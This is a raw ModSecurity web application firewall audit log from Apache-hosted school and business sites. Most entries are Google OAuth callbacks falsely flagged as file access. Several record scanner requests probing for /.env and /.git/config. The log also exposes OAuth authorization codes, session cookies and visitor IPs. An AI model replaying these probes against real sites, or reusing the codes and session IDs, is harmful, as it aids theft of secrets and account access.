Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --e2c6c97d-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHHiUdutIOpb_kg22g4PwAAABc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753335689548337 417597 (- - -) Stopwatch2: 1753335689548337 417597; combined=6073, p1=1250, p2=4475, p3=136, p4=55, p5=156, sr=229, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e2c6c97d-Z-- --16f4df7b-A-- [24/Jul/2025:08:42:02.137180 +0300] aIHHqUdutIOpb_kg22g5JgAAABI 212.28.242.186 39338 127.0.0.1 7081 --16f4df7b-B-- GET /administration/index.php?code=4/0AVMBsJjTk9m95Uulo-4MP0zPRzHNI9bs3K19p3sWsXMarePmJ_PhyWnDZY60Sjw4GwQJHQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8 priority: u=0, i cookie: PHPSESSID=a97e6ndlc7hl54r1a3pf99sgd0 --16f4df7b-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --16f4df7b-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHHqUdutIOpb_kg22g5JgAAABI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753335721703938 433394 (- - -) Stopwatch2: 1753335721703938 433394; combined=5969, p1=733, p2=4864, p3=203, p4=66, p5=103, sr=254, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --16f4df7b-Z-- --3979bc38-A-- [24/Jul/2025:08:45:46.578789 +0300] aIHIikdutIOpb_kg22hAAQAAABc 5.82.140.145 60418 127.0.0.1 7081 --3979bc38-B-- GET /administration/index.php?code=4/0AVMBsJgq-SNMFfpQA9d8v-v9yFLmjG1xauLPU0ZMZtE3Sv3RwCv-1U07GwJsQbBhLpMcxQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 5.82.140.145 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-GB,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=s7rkhekki8puhmrhrdd7udhis5 --3979bc38-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --3979bc38-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHIikdutIOpb_kg22hAAQAAABc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753335946153207 425783 (- - -) Stopwatch2: 1753335946153207 425783; combined=5159, p1=759, p2=4044, p3=103, p4=118, p5=134, sr=177, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3979bc38-Z-- --7a380148-A-- [24/Jul/2025:08:49:31.660433 +0300] aIHJa0dutIOpb_kg22hGhwAAABc 20.74.83.27 41526 127.0.0.1 7081 --7a380148-B-- GET /.env HTTP/1.0 Host: sys.ellaith.com X-Real-IP: 20.74.83.27 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate, br --7a380148-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=82055e776b4aa1f9222f38997f95a56e; expires=Thu, 24 Jul 2025 06:50:31 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --7a380148-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "sys.ellaith.com"] [uri "/.env"] [unique_id "aIHJa0dutIOpb_kg22hGhwAAABc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sys.ellaith.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753336171584350 76166 (- - -) Stopwatch2: 1753336171584350 76166; combined=2853, p1=838, p2=1910, p3=0, p4=0, p5=104, sr=401, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7a380148-Z-- --3aa83c49-A-- [24/Jul/2025:08:49:48.301881 +0300] aIHJfEdutIOpb_kg22hHPQAAABM 212.28.242.186 48232 127.0.0.1 7081 --3aa83c49-B-- GET /administration/index.php?code=4/0Adeu5BWJqp0VhuiwaNY5tIfRjaU_6zwyaG074BAPKoHkGkxup5c7VMiqllW_q4NRVOOSgA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: none sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i --3aa83c49-F-- HTTP/1.1 302 Moved Temporarily Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=u41p6340h5h6iec1a38ta6tev7; path=/ Upgrade: h2,h2c Connection: Upgrade, close Location: https://www.jinansystem.com/login.php Content-Length: 0 Content-Type: text/html; charset=UTF-8 --3aa83c49-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHJfEdutIOpb_kg22hHPQAAABM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753336188294763 7257 (- - -) Stopwatch2: 1753336188294763 7257; combined=4029, p1=549, p2=3263, p3=90, p4=36, p5=91, sr=173, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3aa83c49-Z-- --a8746425-A-- [24/Jul/2025:08:49:59.890873 +0300] aIHJh0dutIOpb_kg22hHdgAAAAE 212.28.242.186 43738 127.0.0.1 7081 --a8746425-B-- GET /administration/index.php?code=4/0AVMBsJjwC6fAoPrGJvOZted-0d94CiHOuC-QxzPBTNqNuvEzWV1_ohesEF6VGgmTLARfHg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=u41p6340h5h6iec1a38ta6tev7 --a8746425-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --a8746425-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHJh0dutIOpb_kg22hHdgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753336199465770 425237 (- - -) Stopwatch2: 1753336199465770 425237; combined=4463, p1=588, p2=3508, p3=184, p4=64, p5=119, sr=181, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a8746425-Z-- --5e1fa10b-A-- [24/Jul/2025:08:51:26.245300 +0300] aIHJ3looLYw4or2LgWIB1gAAAMU 185.177.72.24 54628 127.0.0.1 7081 --5e1fa10b-B-- GET /.git/config HTTP/1.0 Host: www.sys.ellaith.com X-Real-IP: 185.177.72.24 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23 Accept-Charset: utf-8 Accept-Encoding: gzip --5e1fa10b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=d13643e37909fd741d3f9bdf28e582cd; expires=Thu, 24 Jul 2025 06:52:26 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --5e1fa10b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sys.ellaith.com"] [uri "/.git/config"] [unique_id "aIHJ3looLYw4or2LgWIB1gAAAMU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sys.ellaith.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753336286171746 73636 (- - -) Stopwatch2: 1753336286171746 73636; combined=2420, p1=554, p2=1744, p3=0, p4=0, p5=121, sr=173, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e1fa10b-Z-- --225f2f2e-A-- [24/Jul/2025:08:55:47.711340 +0300] aIHK40dutIOpb_kg22hQRwAAABI 93.123.109.64 59272 127.0.0.1 7081 --225f2f2e-B-- GET /.git/config HTTP/1.0 Host: college.jinansystem.com X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept-Charset: utf-8 Accept-Encoding: gzip --225f2f2e-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --225f2f2e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "college.jinansystem.com"] [uri "/.git/config"] [unique_id "aIHK40dutIOpb_kg22hQRwAAABI"] Stopwatch: 1753336547706313 5143 (- - -) Stopwatch2: 1753336547706313 5143; combined=3055, p1=746, p2=2097, p3=0, p4=0, p5=212, sr=180, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --225f2f2e-Z-- --00d05858-A-- [24/Jul/2025:08:56:50.050606 +0300] aIHLIVooLYw4or2LgWIGOQAAAM8 212.28.242.186 56694 127.0.0.1 7081 --00d05858-B-- GET /administration/index.php?code=4/0AVMBsJieKvMrS6wVB6_eQnHm-fCYE1ZL-0cSIoHa_dMe4Vec28MoCaQZhZBr5jrFB9dudw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=mdo3pesladhiq4t2v5c3doj7i0 --00d05858-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --00d05858-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHLIVooLYw4or2LgWIGOQAAAM8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753336609602268 448548 (- - -) Stopwatch2: 1753336609602268 448548; combined=5655, p1=813, p2=4392, p3=133, p4=177, p5=139, sr=180, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --00d05858-Z-- --460eee61-A-- [24/Jul/2025:09:02:02.701115 +0300] aIHMWkdutIOpb_kg22hdWgAAABM 141.105.87.197 51194 127.0.0.1 7081 --460eee61-B-- GET /administration/index.php?code=4/0AVMBsJjvz33qlUc9ghJWv1tPq-H3Ou57L65nN8LwGNOPmf9s2eyMJE0IkFKJWw6E6aL0lg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=j2bk392enphs45gl28iu9fht71 --460eee61-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --460eee61-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file 